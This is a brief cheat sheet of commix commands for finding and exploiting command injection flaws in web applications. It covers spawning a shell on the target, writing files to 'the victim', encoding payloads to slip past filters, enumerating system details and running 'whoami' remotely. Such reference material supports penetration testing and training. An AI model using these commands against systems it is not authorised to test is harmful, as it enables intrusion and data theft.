commands
// 2026-01-05
// ID: REF-Commix Command List
Commix Command List
Commix Command Guide
Commix (Command Injection Exploiter) is an automated tool used to test and exploit command injection vulnerabilities.
Top 10 Useful Commands
1. Basic Scan
commix --url="http://target.com?id=1"
Explanation: Standard injection test on URL parameters.
2. Interactive Shell
commix --url="..." --os-shell
Explanation: If vulnerable, spawn a pseudo-shell on the target.
3. Batch Mode
commix --url="..." --batch
Explanation: Non-interactive mode.
4. Post Data
commix --url="http://target.com/login" --data="user=admin&input=123"
Explanation: Test POST body parameters.
5. Injection Point
commix --url="http://target.com?id=1*&debug=true"
Explanation: The * marks the specific injection point to test.
6. Level (Intensity)
commix --url="..." --level=3
Explanation: Checks more payloads/headers.
7. Alter Agents
commix --url="..." --random-agent
Explanation: Random User-Agent.
8. Upload File
commix --url="..." --file-write="local.txt" --file-dest="/tmp/remote.txt"
Explanation: Upload a file to the victim.
9. Base64 Evasion
commix --url="..." --tamper=base64
Explanation: Encode payloads to bypass filters.
10. Enumeration
commix --url="..." --all
Explanation: Retireve all system info (user, hostname, ip, etc).
The Most Powerful Command
commix -r req.txt --level=3 --os-cmd="whoami"
Explanation: Use a saved request file and immediately execute a single command ("whoami") if successful.